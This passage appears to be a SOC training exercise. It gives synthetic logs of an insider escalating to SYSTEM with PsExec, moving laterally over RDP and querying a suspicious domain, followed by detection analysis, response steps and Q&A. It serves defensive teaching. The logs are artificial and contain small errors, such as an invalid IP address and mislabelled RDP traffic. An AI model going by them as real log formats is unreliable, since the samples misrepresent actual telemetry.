• Endpoint Security: Implement endpoint security solutions that detect and block
the use of unauthorised applications, including cloud storage software.
SCENARIO 5: INSIDER THREAT - UNAUTHORISED PRIVILEGE ESCALATION
AND LATERAL MOVEMENT

Scenario: An analyst in the Security Operations Center (SOC) receives an alert of

abnormal privileged account activity. The alert indicates that a user from the IT
department, alice.jones, has gained unauthorised access to a critical server and escalated
privileges to SYSTEM-level access, which is outside the scope of her role.

The user then proceeds to explore other systems and attempt lateral movement across the
internal network. The situation is flagged for investigation to determine if this is an insider
threat, potential privilege misuse or a compromised account.

LOGS

1. Active Directory Logs

Jan 17 10:00:02 ad01 192.168.100.21 User "alice.jones" logged in to "Server-DC01"

(Domain Controller) with account "alice.jones".
Jan 17 10:05:45 ad01 192.168.100.21 User "alice.jones" granted elevated privileges (Local
Administrator) on "Server-DC01".
Jan 17 10:06:32 ad01 192.168.100.21 User "alice.jones" logged in to "Server-DC01" as
SYSTEM (via PsExec).
Jan 17 10:20:22 ad01 192.168.100.21 User "alice.jones" logged in to "Server-DB01"
(Database Server) from "Server-DC01" via RDP (Remote Desktop Protocol).
Jan 17 10:30:12 ad01 192.168.100.21 User "alice.jones" attempted to escalate privileges
on "Server-DB01" via local privilege escalation tool (e.g., Mimikatz).
Jan 17 10:35:56 ad01 192.168.100.21 User "alice.jones" logged in to "Server-WEB01" (Web
Server) from "Server-DC01" via RDP.
Jan 17 10:50:05 ad01 192.168.100.21 User "alice.jones" logged out from "Server-WEB01".
Jan 17 10:55:15 ad01 192.168.100.21 User "alice.jones" logged out from "Server-DB01".

2. Firewall Logs

Jan 17 10:15:22 fw1 192.168.100.21 [INBOUND] - 192.168.100.21:3389 - RDP connection

to "Server-DB01" established.
Jan 17 10:35:56 fw1 192.168.100.21 [INBOUND] - 192.168.100.21:3389 - RDP connection
to "Server-WEB01" established.
Jan 17 10:45:01 fw1 192.168.100.21 [OUTBOUND] - 192.168.100.21:53 - DNS query for
"external.com" (Suspicious domain resolution).

3. SIEM Logs

Jan 17 10:00:02 siem1 src=192.168.100.21 dest=192.168.100.101 protocol=RDP

event=unauthorised_privileged_access
Jan 17 10:05:45 siem1 src=192.168.100.21 dest=192.168.100.101
event=privilege_escalation_detected
Jan 17 10:06:32 siem1 src=192.168.100.21 dest=192.168.100.101
event=unauthorised_login_as_SYSTEM
Jan 17 10:20:22 siem1 src=192.168.100.21 dest=192.168.100.201 protocol=RDP
event=lateral_movement_attempt
Jan 17 10:30:12 siem1 src=192.168.100.21 dest=192.168.100.201
event=privilege_escalation_attempt
Jan 17 10:35:56 siem1 src=192.168.100.21 dest=192.168.100.301 protocol=RDP
event=lateral_movement_attempt
Jan 17 10:45:01 siem1 src=192.168.100.21 dest=8.8.8.8 protocol=DNS
event=suspicious_dns_query

4. Sysmon Logs (on Server-DC01)

Jan 17 10:06:32 sysmon1 192.168.100.21 Process "PsExec.exe" executed by user

"alice.jones" with elevated privileges (SYSTEM).
Jan 17 10:10:45 sysmon1 192.168.100.21 Process "cmd.exe" executed by "alice.jones"
with SYSTEM privileges.

ANALYSIS

1. Detection of Suspicious Activity:

• Privilege Escalation: The logs show that alice.jones, an IT department user, initially
logged into Server-DC01 (the domain controller) and was granted local
administrator privileges on the system. This itself is not inherently suspicious, but
the fact that she later logged in as SYSTEM using PsExec is a clear sign of privilege
escalation. PsExec is a legitimate tool, but its use in this context suggests
unauthorised access.
• Lateral Movement Attempts: After gaining SYSTEM access on the domain
controller, alice.jones attempted lateral movement to other critical servers (e.g.,
Server-DB01 and Server-WEB01) using RDP. These connections were unauthorised
and were made from Server-DC01, indicating that the attacker was trying to explore
other network resources.
• Privilege Escalation Tools: The attempt to use privilege escalation tools (e.g.,
Mimikatz) on Server-DB01 is another red flag indicating malicious intent.
• Suspicious DNS Query: The outbound DNS request to external.com is unusual, as
this domain does not appear to be part of the company’s network, which may
suggest an attempt to communicate with an external, potentially malicious, entity.

2. Indicators of Compromise (IOCs):

 • Suspicious Process Execution: The execution of PsExec.exe and cmd.exe with
SYSTEM privileges indicates an abuse of legitimate administrative tools for
malicious purposes.
• Lateral Movement: The RDP connections to Server-DB01 and Server-WEB01
without appropriate authorization are suspicious.
• Suspicious DNS Query: The DNS request to a non-recognised domain
(external.com) raises the possibility of data exfiltration or remote command-and-
control (C2) communication.
• Multiple Privilege Escalation Attempts: The attempted escalation of privileges
across multiple systems within a short time window suggests the user’s intent to
explore critical infrastructure.

RESPONSE ACTIONS

1. Immediate Containment:

• User Account Lockdown: Disable alice.jones's account immediately to prevent

further unauthorised actions.
• Network Isolation: Disconnect Server-DC01, Server-DB01 and Server-WEB01 from
the network to prevent further lateral movement and potential data exfiltration.
• Restrict Remote Access: Block RDP access to sensitive servers to prevent any
further remote logins until the investigation is complete.

2. Investigation:

• Root Cause Analysis: Investigate the initial entry point. Was alice.jones's account
compromised or did she exploit a vulnerability to escalate privileges? Conduct an
analysis of her workstation and any tools used (e.g., PsExec, Mimikatz).
• Forensic Analysis: Perform a forensic investigation on Server-DC01, Server-DB01
and Server-WEB01 to check for any signs of data exfiltration or malicious actions.
• Check DNS Logs: Review DNS logs for any other suspicious activity, especially
queries to unknown external domains. Investigate if there was any data exfiltration
to external.com.
• Review Historical Activity: Analyse previous login and access logs to check if
similar suspicious activities occurred in the past.

3. Long-Term Mitigation:

• Enforce Least Privilege: Ensure that privileged accounts are restricted based on
the principle of least privilege. Implement a policy to enforce strict controls over
administrative privileges.
• Monitor Privileged Access: Implement privileged access management (PAM) to
better control, monitor and audit privileged account activity.
 • Network Segmentation: Apply stricter network segmentation and limit lateral
movement by restricting RDP and other remote administrative tools to only
necessary personnel.
• DNS Filtering: Implement DNS filtering to block access to malicious or suspicious
domains to prevent data exfiltration and communication with command-and-
control servers.

Discussion Questions and Answers

1. What are the primary indicators of compromise in this scenario?

• Unauthorised Privilege Escalation: The use of tools like PsExec and Mimikatz to
escalate privileges to SYSTEM level is a clear indicator of compromise.
• Lateral Movement: Unauthorised RDP connections to Server-DB01 and Server-
WEB01 suggest malicious intent to explore further systems in the network.
• Suspicious DNS Query: The DNS request to external.com raises concerns about
potential data exfiltration or C2 activity.

2. How can you mitigate the risk of privilege escalation and lateral movement?

• Use Least Privilege: Enforce strict least-privilege access control to ensure users
only have the permissions necessary for their role.
• Monitor Privileged Accounts: Use tools like Privileged Access Management (PAM)
to monitor, log and audit the use of privileged accounts.
• Network Segmentation: Isolate critical servers and apply network segmentation to
limit the spread of an attack if lateral movement occurs.

3. What additional tools or techniques could help detect and prevent this type of
attack?

• Endpoint Detection and Response (EDR): EDR tools can detect unauthorised use
of tools like PsExec and privilege escalation attempts in real time.
• SIEM: Advanced correlation rules in a SIEM can identify abnormal login patterns,
privilege escalation events and lateral movement.
• DNS Security: Using DNS filtering solutions can help prevent communication with
known malicious domains and reduce the risk of C2 traffic.